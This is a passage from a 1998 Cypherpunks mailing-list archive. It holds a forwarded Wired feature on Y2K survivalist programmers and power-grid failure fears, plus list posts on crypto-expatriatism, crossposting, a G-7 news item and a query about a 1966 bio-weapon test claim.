perhaps best be described as a kind of Millennial Neighborhood Watch. 

 Until last year, Paloma was a Y2K project manager at the Rover Group, a
UK-based auto manufacturer, where her first responsibility was to identify
all of the company's vulnerable systems and target them for patching. But
her search didn't end with a couple of corporate mainframes. Inadvertently,
Paloma opened up the Pandora's Box of Y2K: embedded systems. 

 Embedded systems draw the Y2K bug-fixing task out of cyberspace and into
the real world. There are lots of pea-brained microchips out there, nestled
in everything from microwave ovens and automobiles, to power plants and oil
refineries. Most don't care what the date is, but a small percentage of
them do, and that made Paloma nervous. "I became concerned about just how
prevalent embedded systems are," she recalls. "Several members of my family
have medical problems, so when I started investigating I became very
concerned about medical devices like defibrillators, physiological
monitoring equipment, and the entire medical services infrastructure." 

 When her contract came up for renewal in 1997, Rover asked Paloma to stay
on in London to 2000. She declined - the thought of family and friends
surrounded by noncompliant systems that might leave them cold, hungry, and
without medical services was too much to ignore. Back in the States she
began networking with other people who shared her concerns, and that's when
she realized "we needed to put together an organization to address the
issues and get information out to the public." 

 Thus The Cassandra Project was born. In Greek mythology, Cassandra was a
mortal woman courted by the god Apollo. To win her affections, Apollo gave
her the gift of prophecy. Still, Cassandra rejected him, so the frustrated
deity decreed that no one would ever believe her predictions. Paloma
O'Riley gave a nod to Cassandra's fate when she chose the name for her Y2K
preparedness group, but she is precisely the kind of mortal woman you'd
want at your next PTA meeting - a firm believer in the notion that some
good, old-fashioned community-building may keep the Y2K nightmare at bay. 

 The Cassandra Project has helped spawn a dozen Y2K community preparedness
groups around the country. It has a board of directors that includes
several computer professionals and a Web site at millennia-bcs.com that
lists a menu of articles discussing possible Y2K scenarios, ranging from
minor annoyances to outright Y2Kaos. The site attracts more than 100,000
visitors a month. 

 Between speaking engagements, Paloma spends her days organizing biweekly
meetings with neighbors to discuss contingency plans, and lobbying the
state government. "We've been working with the Cassandra group on a lot of
their initiatives," says Steve McNally, staff director of the Colorado
Information Management Commission. "They've talked to several legislators
and the governor's office and brought some awareness of the issues to the
table." 

 For her part, Paloma and her family plan to stockpile a six-month supply
of food. Her worst-case scenarios look much the same as those of the most
hardcore, self-sufficient Y2K survivalists, but the bomb-shelter aspect is
conspicuously missing. Paloma believes that people will pull together in
times of turmoil. If calamity strikes and she is forced to draw the line,
she's determined to do so in her own backyard. 

 Even if Paloma's neighborly pragmatism sets her apart from the militia
types and fundamentalist Christians who regularly contact The Cassandra
Project, her efforts have brought her in contact with a thriving
premillennial subculture. "People in other millennial movements, including
Christian fundamentalism, point to Y2K as a sign of the times," says Philip
Lamy, a professor of sociology and anthropology at Castleton College in
Vermont. Lamy specializes in the study of secular millennialism, and he
sees Y2K survivalism as a prime example of the genre. "Generally,
millennial movements appear when a society or culture is going through a
period of rapid cultural, economic, or technological change," he says. "The
explosion of the Internet and the World Wide Web is fueling a lot of this
now." 

 Still, there are a few things that set the Y2Kers apart from the crowd.
For one, the Y2K bug is not simply a matter of myth, superstition, or
prophesy - it is a tangible problem hardwired into the fabric of our
industrial society. In addition, the people who are taking Y2K most
seriously are not laypeople or neophytes - they are specialized technicians
who approach the situation with a sophisticated understanding of society's
hidden machinery. But if heightened technical awareness alone could explain
the apocalyptic conclusions drawn by the Y2K survivalists, then every
well-informed computer geek would be moving to the desert - and that
clearly isn't happening. With so many intertwined variables to consider,
logic inevitably takes a back seat to subjective intuition - a personal
sense of security that extends from the microcosm of a single computer
program to the macrocosm of modern society. Ultimately it all comes down to
faith. 

 But this, too, sets the Y2K survivalists apart. True millennialism is
rooted in faith - fundamentalist Christians may anticipate an apocalypse,
but they optimistically expect it to be followed by 1,000 years of
celestial rule. Y2K survivalism, on the other hand, doesn't concern itself
with redemption. It is antimillennial - the polar opposite of
techno-millennial movements like the Extropians who see technology as the
stairway to a higher plane. (See "Meet the Extropians," Wired 2.10, page
102.) 

 "All this suggests that you don't have to be a religious fanatic, a
Christian fundamentalist, or a ufologist to believe that our world may be
in trouble - that there's something serious afoot in our nation and our
world," Lamy adds. "The Y2K problem is overlapping with other survivalist
movements, and like them it shares a kind of a fatalistic vision of the
future." 

 Three weeks have passed since Scott Olmsted put the carpet installers to
work in his retreat. The carpet is in now, and he's turned his attention to
other details, like night-vision equipment - his property is on high
ground, and with the right hardware he could scan most of the valley from
his backyard. He's also thinking of getting laser eye surgery so that he
won't be dependent on contact lenses after 2000. It never seems to end.
"Once you take the first steps to prepare, you basically admit that this is
big enough to do something about. And then you realize you should be doing
more." 

 Scott has turned his back on denial - the blind faith that allows people
to live normal lives in the face of staggering complexity, risk, and
uncertainty. Instead, he's chosen to acknowledge his own vulnerability. As
he describes it, "I've always known that the economy is complex and that we
live on the end of a long chain of ships, planes, and 18-wheelers." Scott
sees how the Y2K bug could disrupt that chain, and like other resolute
souls - environmental activists, antiabortion protesters, and corporate
whistle-blowers to name a few - he, too, has been driven to act by the
clarity and intensity of his vision. The rest of us may be content without
quite so much awareness, but embracing the Bug has actually made Scott feel
better. "I know one guy who started taking Prozac when his denial fell
away," he says. "Taking action - doing something - really gets you out of
that." 

 Scott admits there isn't enough evidence to prove he's right. But, he
insists, that's not the way to look at it. "There's not nearly enough
evidence pointing the other way to make me abandon my preparations," he
says. In a way, he's managed to optimize the Y2K problem - even if the new
millennium dawns without incident, his efforts will have yielded a supply
of inexpensive food, a new collection of practical skills, and a nice
vacation home in the country. It's an eminently logical win-win, and Scott
has taken comfort in that. "I'm not waiting until the ground is shaking to
prepare for the Y2K earthquake," he muses. "I'm going to be ready for an
8.5. I may look foolish if it turns out to be minor, but that's OK. That's
the nature of decisionmaking under uncertainty."

 Kevin Poulsen is a columnist for ZDTV.com . 

 America Offline 

 ( Inside the Great Blackout of '00 )

 "Most of the nation's power systems must be compliant, or they all go
down, region by region, in one gigantic, rolling blackout," warns Gary
North, keeper of the oldest, most notorious Y2K doomsday site on the Web.
If the lights go out at the dawn of the 21st century, North believes the
failure will be permanent, because the computers that control the grid will
be unfixable if there isn't power to run them. Thereafter, he argues, the
blackout will trigger the collapse of civilization. 

 The North American grid is vulnerable to simultaneous failures. Generating
facilities in the US, Canada, and Mexico jointly move power through
high-tension lines that distribute electricity through four regional
interconnections. Within each region, if one facility goes offline, the
others compensate to pick up the slack. But there's not much spare capacity
built into the system; the North American Electric Reliability Council, a
group that is drawing up a timetable of Y2K fixes for the Department of
Energy, admits that if multiple generating facilities fail in one region,
this "may result in stressing the electric system to the point of a
cascading outage over a large area." 

 This is how it could happen: A power station is equipped with safety
systems that deactivate steam boilers if they aren't maintained frequently.
Suppose maintenance was last performed in 1999, which an embedded chip
recorded as "99." Now it's the year 2000, so the chip subtracts the old
year, 99, from the new year, 00, and finds, amazingly, that maintenance was
last performed -99 years ago. Clearly this is an error, so the chip shuts
down all the boilers, just to be safe. 

 Meanwhile, at another power station, a temperature sensor attached to a
transformer averages its readings over time. On January 1, 2000, the sensor
divides temperature by the year - which is expressed as "00" - and comes up
with an infinite value, triggering another shutdown signal. If small faults
like these knock out a half dozen facilities, the rest will go offline to
protect generators from burning out in a hopeless effort to meet the
growing demand. 

 The distribution grid also has weak points. "We have at least 800
different types of embedded controls on the wires," explains Gary Steeves,
director of a Y2K project at TransAlta Utilities, the largest
investor-owned power company in Canada. "Some of the protective devices log
dates of faults in activity and can automatically take a component out of
service." If the same controller has been installed in thousands of remote
locations, and the chips share the same Y2K bug, they'll all fail
simultaneously. 

 Most US power utilities refuse to comment on the likelihood of these
disasters, fearing litigation if they offer reassurances that turn out to
be wrong. 

 Tim Wilson, publisher of Y2k News, worries about the nearly 9,000 small
regional companies that pull power off the grid at the local level.
"They're clueless as to what to do about Y2K," says Wilson. "They know they
have embedded chips, but they don't know where they are. If there's a power
shortage, rural areas may not be allowed to take power off the grid,
because cities could have a higher priority." 

 This suggests an ironic scenario: Remote areas may remain dark for weeks
or months after January 1, 2000, leaving Y2K survivalists waiting in their
isolated cabins for the lights to come back on - while complacent urban
dwellers enjoy uninterrupted service. 

 - Charles Platt 

Copyright (c) 1993-98 The Cond Nast Publications Inc. All rights reserved. 
Compilation Copyright (c) 1994-98 Wired Digital Inc. All rights reserved. 
- -----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
- -----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 8 Sep 1998 08:52:02 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: A question about gas warfare in San Fran in '66...
Message-ID: <199809080109.UAA06813@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Here in Austin we have a local radio dj who does a public access show on
various issue localy and nationaly, Alex Jones, who has put a piece on some
sort of bio-weapon test that occurred in '66 in San Francisco. He is
claiming that deaths resulted.

Anyone have a clue what he's talking about?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 8 Sep 1998 11:23:05 +0800
To: Mark Hedges <cypherpunks@cyberpass.net
Subject: Re: crossposting
In-Reply-To: <s5f44f00.016@aba.com>
Message-ID: <v0313030eb21a5206cc48@[209.66.100.36]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:30 PM -0700 9/7/98, Mark Hedges wrote:
>Ya know, I sometimes cross-post across lists when I shouldn't, so I'm
>guilty of that too, but now that I'm on so many of these lists, I really
>see the reasons behind one of the biggest complaints. I'm getting about 4
>copies of each of the messages in the Vince Cate thread.
>
><insert gratuitous 'me too' here>

I stay off of these proliferating lists. The Cypherpunks list was the first
one, and despite its many flaws over the years, it's enough for me.

I'm not on the Lewispunks list, nor the Perrypunks list, nor any of the
many Hettingapunks lists. And when the Cypherpunks list briefly became the
Sandypunks list, I left for a while.

Works for me. Cypherpunks...the Real Thing (TM).

BTW, I dislike getting all these crossposts from Lewispunks, Perrypunks,
and Hettingapunks, all the more so when attempting to _reply_ to these
messages often generates "You have no permission to post to this list"
responses, or the like. Makes me want to get some of Vulis' tools and apply
them appropriately.

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 8 Sep 1998 09:13:44 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Emergency G-7 meeting in England on Sat....
Message-ID: <199809080131.UAA06954@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://cnnfn.com/hotstories/economy/9809/07/g7_pkg/

>    Britain calls deputies to London to discuss Russia's economic turmoil

>    Special Report: Eyes on the Market - Sept. 7, 1998
>    
>    International Monetary Fund LONDON (CNNfn) - An emergency meeting of
>    mid-level G-7 officials will take place in London on Saturday to
>    discuss the Russian economic crisis and try to hammer out ways to help
>    countries facing economic meltdown
>    [INLINE] The special meeting of senior finance and foreign-ministry
>    officials from the world's industrialized nations was scheduled after
>    the Duma, Russia's lower house, Monday rejected for a second time the
>    nomination of Victor Chernomyrdin as prime minister, leaving Russia
>    without a government.
>    [INLINE] The G-7 officials are also expected to discuss how to protect
>    their own economies.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 8 Sep 1998 12:20:50 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism
In-Reply-To: <s5f44f00.017@aba.com>
Message-ID: <v0313030fb21a54ac6b9b@[209.66.100.36]>
MIME-Version: 1.0
Content-Type: text/plain



(As per my last message, I have deleted all of the mailing lists except
Cypherpunks.)


At 7:51 PM -0700 9/7/98, Black Unicorn wrote:


>I am constantly amused at the attitude of Americans who are convinced that
>anyone who lives outside of the "end-all-be-all of the civilized world"
>must live in some third world country.  This too is nonsense.  If I were
>jurisdiction shopping I'm not sure I'd pick a small African nation, as some
>others have, because this state would be extremely unlikely to protect me
>from the kind of nastiness that nations are expected to protect citizens
>from.  Also, visa-free travel is a pretty big consideration.  Picking a
>country not well established in this regard is folly.

I'm not going to criticize Vince for his decision to go with
Mozambique...but....

Seems not to too long ago Mozambique was a semi-Communists African
dictatorship, involved in various wars with RSA (the original one). And
various killings of Westerners, and so on.

But I may be misremembering. And Mozambique may have changed (or, rather,
the ruler may have changed). But it seems to me that perhaps paying $5000
for Mozambiquan (sp?) citizenship will buy just about that amount of
protections.

Vince is probably safe enough. But if ever gets into a snit at some border,
or if the U.S. seeks an extradition (not that I am predicting this, as
crypto is still too obscure for such headline-grabbing efforts), I rather
doubt the Mozambiquan consulate or embassy will lift even a little toe to
help.

Were I to expatriate, I'd pick a more stable country, like Switzerland or
the other countries BU often speaks of. Or I'd just travel around and count
on  their being little nexus of my activities.

(Which would be my main strategy: use the very cryptographic technologies
we support to virtualize the activities and make the whole issue moot. This
would require a fair amount of care in using the tools consistently,
without any slip-ups, but it seems doable. With care, one could run a
crypto development effort from some pleasant U.S. locale with no means of
proving any U.S. laws were being broken. Sameer seems to be doing it even
fairly openly, so imagine how much more secure someone who never publicized
his role could be?)


>Some of you who want a counterpoint based on something a bit more
>substantial than provincial fear mongering might ask after Tim May, who I
>recall considered departing the United States but decided against it for a
>variety of reasons.

Well, I'm in a somewhat different position from either Vince, who has
renounced, or Ryan, who is merely residing in the sunny Caribbean for some
amount of time.

* My assets are inextricably known to the IRS, SEC, and suchlike, via the
rules about stock ownership, transfer agents, etc. (Even had I wanted to
"hide" my assets as long ago as the early 80s, it would have been
effectively too late.)

* There may be ways I could flee the U.S. and get my assets out. Merely
taking my _certificates_ out is of course not nearly enough. Certificates
are not bearer instruments. Wiring my assets out may work, but is risky.
(Were I more serious about fleeing, I would know more about this. But I am
not, so I haven't looked into this in detail.)

* Oh, and this kind of flight by me would probably complicate my life in
various ways. While BU says he knows of various tax fugitives who still
cross back into the U.S., I know of others who don't feel comfortable doing
so, even in sneaking back i across border crossings like Tijuana. (And Marc
Rich, at the extreme end in wealth, is unable to return to the U.S., due to
warrants out for his detention on tax evasion and securities  charges.)

* What I dislike the most about the U.S. system are things like the gun
control laws, the tax rates, the welfare system, and the increasing
surveillance. Alas, most of the best havens are worse in some ways than the
U.S. (Most Caribbean nations alow no guns. Monaco has surveillance cameras
in all public places and does not like having "outspoken" residents...the
Prince may revoke citizenship on a whim and if a resident draws too much
attention to his little fiefdom. Several major European countries are more
thoroughgoingly statist than the U.S.)

* Anyway, I also _like_ a lot here in the U.S. I like the Constitution,
esp. the earlier, more libertarian parts. I like the scenery. I like the
freedom to travel. I like being able to get on my motorcycle and ride for
as long as I want with no pesky border crossings, no requirement to present
my passport at hotels, no police demanding "papers," and no 70% wealth
confiscation tax rates like some countries have.

(No doubt not all countries have all or most of these things. Enough do.
And as John Walker, founder of Autodesk and expatriate to Switzerland said,
moving to Switzerland from California will NOT lower one's tax rate.)

* I'm a Californian and I like the pleasant Mediterranean climate.

(BTW, I lived for a year on the French Riviera in the 1960s and have
visited a couple of times since. Neither France nor Monaco nor Italy is a
viable place for me, for various reasons.)

I wish Vince, Ryan, and all the others well.

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kawika Daguio" <KDAGUIO@aba.com>
Date: Tue, 8 Sep 1998 09:31:26 +0800
To: rah@shipwright.com, e$@vmeng.com
Subject: Re: e$: crypto-expatriatism
Message-ID: <s5f44f00.016@aba.com>
MIME-Version: 1.0
Content-Type: text/plain



Bob,

The syllogism at the end of your post is exactly why I have spent the last more than 5 years negotiating and lobbying and why we (FI's) and you (everyone else) shouldn't worry about the impact of government policy on the security of financial communications.  Market (macro and microeconomics plays a bigger role than the government.

I wouldn't give up my citizenship,  neither would I join those guys at the Fort and give up my rights to move about the world without asking permission to travel or publish.  I like the balance where I am, but respect those who wish to protest peacefully.  

I would prefer that folks kept us out of their fields of fire in the various skirmishes occuring during the cryptocrusades and left us to manage the policy for and the security of our space for ourselves and our customers.  

just my personal views...kawika...

<<< Robert Hettinga <rah@shipwright.com>  9/ 7  5:29p >>>
-----BEGIN PGP SIGNED MESSAGE-----


At 3:38 PM -0400 on 9/7/98, Robert Hettinga wrote about Ryan Lackey's
whereabouts, on cypherpunks:

> If I told you, I would have to kill you?

Whew. Glad Ryan has now said something publically now about his and Ian's bit
of extraterritorial subtrifuge (though Ian  doesn't qualify, of course). I
mean, I just *hate* keeping secrets... ;-).

Frankly, I *really* have a hard time with all this
man-without-a-first-world-country, crypto-expat stuff. I think making the
technology not eonomically optional is the way to change things, and no
amount of romantic, jurisdiction-shopping "regulatory arbitrage" is going
to alter reality all that much.

But, I guess, Anguilla's as nice a place to have this affliction as any I can
think of.

And, I wish Vince -- and now, apparently, Ryan -- good luck, whatever happens.


Yet, for some reason, memories of Vietnam-era draft-dodgers keep coming to
mind. For what it cost them all personally, not much good came of it, I'd say,
for them or anyone else. The people who protested the war and "fought the good
fight" to end it stayed here to do it, after all. The most potent anti-war
activists were Vietnam vets themselves, for that matter. And, of course,
Ridgeway told Eisenhower at the outset that Vietnam was a multi-million-man
war, and Eisenhower stayed out accordingly, throwing a few marginal people on
the ground to shut Lodge up. It took Testosterone Jack to get a Special-Forces
hard-on. Eventually he and Desktop Lyndon ended up screwing a pooch
instead of the commies.


Do people out there really think somebody like Gore's going to do a
crypto-amnesty someday? I didn't think so. Ashcroft, maybe, but don't hold
your breath, there, either. It'll be decades, I bet, and our "boys over
there" will have grey hair long before they do come back home on this one.
Political inertia is probably going to keep a few people we know outside
the fence, looking in, for an awful long time after the issue's utterly
dead.

I expect people who do this crypto-expat stuff are going to get their
new passports refused at the U.S. border when they visit, and I think that
things are going to get worse for them for a long time before they get better.
Of course, there's a fair argument to be made that if they do get refused,
it's probably time to leave, anyway, but I'll let someone else gnaw that bone.

And, frankly, I *do* expect that the FBI will attempt domestic crypto
controls, just like they've been been trying to do for some time now. But,
unlike a lot of people, I think that the marketplace will steamroller all
such silliness into yet another roadtop attraction, before or after its
legislation.

Anyway, as the old "excrable" e$yllogism goes,

Digital commerce is financial cryptography.
Financial cryptography is strong cryptography.
Therefore, if there's no strong cryptography, there's no digital commerce.


So, call me an optimist.

Like I've said before, I've heard the end of life and liberty as we know it
predicted over and over again -- hell, I've even believed so myself, once or
twice -- but, like the Gibbon quote in my .sig goes, "however it may deserve
respect for its usefulness and antiquity", I ain't seen it happen yet.

Cheers,
Bob Hettinga


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNfRQJMUCGwxmWcHhAQHb7gf ImnoGG28coDgde4cDgnwHyQatO78nY4B
9bMfB9bE1FCqAIZNKfrPzqhJpZzCbYEDYQexXe8bRsl32M7FnIye7w4r7kxeXxns
LbLWY83juOAJNgMhPxPhFVcXb8NqwOQzCnYjLdfKSuJ6/lZuNGvsVohHwYuhNxc9
WlOW1WsqeSl3KyzpdDyZU1jAUvNEJQU9JoeeEvlwFNM7zMW3ZoIQB5SSVLf2HYzX
vtpnZiRsOeSXt0sWmlXHiZ DeB 79z1z157cg/AOn/qAGBLBgZuDp dbRH7B4ynR
ngB6XS irSzNnMWQrVdNYPuRPRRQ h/eV US2Cmjc3uuFcnR/ tnNg==
=0UKh
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Sep 1998 09:51:12 +0800
To: Ryan Lackey <ryan@systemics.ai>
Subject: Re: e$: crypto-expatriatism
In-Reply-To: <v0401170db219f0b9c52c@[139.167.130.246]>
Message-ID: <v04011711b21a29761c02@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Time for a little air clearing, here...


At 6:22 PM -0400 on 9/7/98, Ryan Lackey wrote:


> (Note: my original message was posted to Cypherpunks, which I consider
> to be substantially different than DBS: had I been posting to DBS, I would
> have included different details...list differentiation is kin of useful,
> it's why the different lists were created in the first place)

Perils of the internet, Ryan, everything is everywhere forever. :-).

That's okay, you didn't sound that much different than you do anywhere
else. That was not perjorative, by the way...


> I never said this.  If you'd like to fabricate/summarize/editorialize,
> please make it clear that that's what you're doing, by using the
>traditionally
> accepted editorial convention of square brackets, or some other convention.
> I prefer Chicago Manual of Style, but I'm sure the AP Stylebook is
>acceptable.

Actually, I was quoting *myself*, talking about something you discussed
later, and which crossed paths with the post in question. It might help to
go back and reread the original, in the thread about the cypherpunk
hyperarchive, but, you're excused in the meantime. :-).


> Ian Goldberg isn't involved -- he's working on Zero Knowledge Systems,
> AFAIK, and I wish him luck, but I haven't really spoken to him in months.
>He's
> a Canadian, anyway.

I wasn't talking about *that* Ian. :-). As it is, Ian Grigg has outed
himself on another list already, but he's not the one making expatriate
noise, seeing as he's Australian, and all...

> I haven't mentioned working with anyone else anywhere,
> other than that I'm working for "interesting" clients.  If you know
>otherwise,
> it isn't particularly public knowledge at this point.

Um, yes. And I haven't said anything besides what's publically known.
Certainly *who* you're working for hasn't been revealed yet, and I haven't
done that. Even as much as I hate secrets. :-).


> I'm not breaking US law.  I'm a US citizen.  I pay my taxes, respect US
> law, etc.  It's just that I'm choosing to work on something somewhere other
> than the US, for a variety of reasons.

That's nice to know. Good to hear. See ya when you get back. At least you
haven't made that trip to Antigua or Barbados, or wherever, yet. That, in
my opinion, would be rather silly.

> > And, I wish Vince -- and now, apparently, Ryan -- good luck, whatever
>happens.
>
> Vince formally renounced his citizenship, becoming a citizen of a small
> african country, and intends to remain in Anguilla.  I left the US
> for a while to work on stuff, and to get away from a major US city for
> a while.  I think there's a huge difference here.

Again, marvellous.

> What I have
> done is fundamentally no different than going to Montana to write code
> for a while, other than that it was cheaper and more convenient for me to
> come to Anguilla.

Splendid. At the moment, I'd just barely prefer Anguilla to the North Fork
of the Flathead River myself, but my opinion on the subject is changing...

> (Of course, Vince seems to be doing quite well...)  I just happen to not want
> to go back to the US right now, it's not that I can't if I decide I want
> to at some point.

Again, marvellous. I would just be careful you don't fall in with the wrong
element while you're down there in the World's Best Place for Financial
Cryptography (tm). ;-).

> (who generally does not provide confidential information to people
> who do not like keeping secrets, out of kindness for them)

And, I might add, *you* didn't. :-).

Any information I've revealed on this is public. However, I'm in an
agressively public business, these days, yes? You don't put "Evangelism" in
your business name and expect to hide your light under a bushel basket...

Frankly, I'm only *really* obligated to keep secrets I'm paid to keep,
anymore. Word to the wise, for anyone else out there who wants call me up
and spill the beans. Past obligations will still be honored, of course, but
the rent's gotta be paid, same as it ever was. This includes "keep this
quiet, but..." in email, encrypted or otherwise, followed by This Week's
Business Plan. Frankly, I don't want to hear that stuff anymore unless
there's some remuneration behind it. Game over.

Cheers,
Bob Hettinga


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Sep 1998 09:52:35 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Wired: "The Y2K Solution: Run for Your Life!!"
Message-ID: <v04011714b21a3aa726a2@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Tue, 08 Sep 1998 18:38:07 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Wired: "The Y2K Solution: Run for Your Life!!"
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  Wired
http://www.wired.com/wired/6.08/y2k.html

F E A T U R E|Issue 6.08 - August 1998

The Y2K Solution: Run for Your Life!!
 By Kevin Poulsen

 Scott Olmsted is dressed to do some serious debugging: comfortable khaki
shorts, a T-shirt from a Visual Basic conference, and a visor from one of
his Silicon Valley employers. But we're a long way from the land of
cubicles and industrial parks. In fact, we're a long way from just about
everything.

 Scott is debugging with a hammer, trying to remove a stubborn two-by-four
from the wall of a mobile home plunked down in the high desert of Southern
California. After banging away for a few minutes, he finally yanks the stud
off the wall in a flurry of sawdust and splintered wood. It's a small
victory, but it brings him one step closer to his own solution to the
greatest computer glitch in history - the Year 2000 Bug. With more than 20
years of computer programming experience under his belt, Scott has decided
that the only real fix for the Y2K problem may be to pack up and move to
this patch of land 75 miles from his San Diego home. "In the next year or
so," he predicts, "the most common cocktail party chatter will be, 'What
are you doing to prepare for Y2K?' But by then, it will be too late."

 This is sagebrush country, the kind of place where you can hear your
footsteps crunching in the gravel. But even here, 30 miles from the nearest
interstate, a line of telephone poles runs along the dirt road and PacBell
terminal boxes sprout from the ground alongside the cacti. While carpet
installers work in the next room, Scott is planning for the day when it may
all be useless. The property came with a freshwater well, and he'll soon
have a solar panel for power. For protection against looters, he's about to
purchase his first gun. "I've seen how fragile so many software systems are
- how one bug can bring them down," he worries. The idea of hundreds,
thousands, millions of bugs cascading all at once keeps him awake at night.

 His Y2K retreat is easy to spot. In an area where high security means a
few strands of barbed wire clinging to a rusty pole, Scott's chain-link
fence is shiny and new. The alarm-company sign that hangs from the fence
would be more at home in Brentwood, and on the roof there's a DirecTV
satellite dish pointed toward the sky. The shed outside his back door will
hold nonperishable food. But with a programmer's methodical logic, Scott
didn't rush out to buy a year's worth of dehydrated grub. First he sampled
the fare from several distributors. One company sold a textured vegetable
protein that was a bit more expensive, but it came in a variety of flavors:
chicken, beef, and taco. "It was pretty good," Scott says, in the halting
measured tones of someone who doesn't want come across as a wacko. "We were
pleasantly surprised." So he splurged. What the hell, doomsday comes along
only once in a lifetime.

 Throughout history, prophets and visionaries have spent their lives
preparing for the end of the world. But this time veteran software
programmers are blazing the millennial trail. The geeks have read the
future, not in the Book of Revelation, but in a few million lines of
computer code.

 By now, the source of their anxiety is well known. In the 1950s and 1960s,
when the computer world was young and memory was expensive, programmers
developed a convention for marking the passage of time. It's the same
system most people use to date their checks: two digits for the day, two
for the month, and two for the year. Dropping the "19" from the year was
convenient, and it saved two bytes of precious RAM every time it was used.

 Those were days of innocence and optimism. Everyone knew what would happen
if this little shortcut was still in use in AD 2000 - the two-digit year
would roll over like the odometer on an old Chevy, and the computers would
think they'd jumped 100 years into the past. Programmers knew it, and they
warned their managers. Not to worry, was the usual reply. When the
millennium finally rolls around, all this code will be ancient history.

 But the code stuck around. The old software worked fine in the
postmainframe world, so nobody felt compelled to replace it. Instead, like
Roman architects, they just built on top of it. The two-digit year became a
standard, wired right into the heart of Cobol - the Common Business
Oriented Language that still serves as the digital workhorse of commerce
and industry. It also crept into the embedded microchips found in
everything from VCRs to nuclear power plants. For years the Y2K bug sat
quietly, remembered largely as an amusing textbook example of poor software
design.

 But as 2000 drew near, the screwup became less amusing. In November 1996,
the comp.software.year-2000 newsgroup was launched, creating a forum that
would soon become ground zero for the Y2K survivalist movement. But at
first, the charter was clear: Discussions would be limited to Y2K bug
fixes, remediation strategies, and reports.

 Over the course of the next year, information poured into the newsgroup,
and most of it was bad: The FAA was hopelessly behind schedule in patching
air-traffic-control systems; Edward Yardeni, chief economist for Deutsche
Morgan Grenfell Bank, laid odds that Y2K upheaval would trigger a
recession; Ed Yourdon, a respected software guru and author of 25 computer
books, predicted the collapse of the US government - not long after he
packed up and moved to New Mexico.

 Optimism became a scarce commodity. Philosophical questions were raised:
Do programmers have a moral duty to remain at their keyboards until the
last moments of 1999, like captains on a sinking ship? Debates raged over
social Darwinism and the ownership of wheat in grain elevators. The
conversation moved on to the viability of dry dog food as emergency
rations. Plans were made to begin converting equities into gold and buying
land in remote parts of California, Arizona, and Oklahoma. January 1998 saw
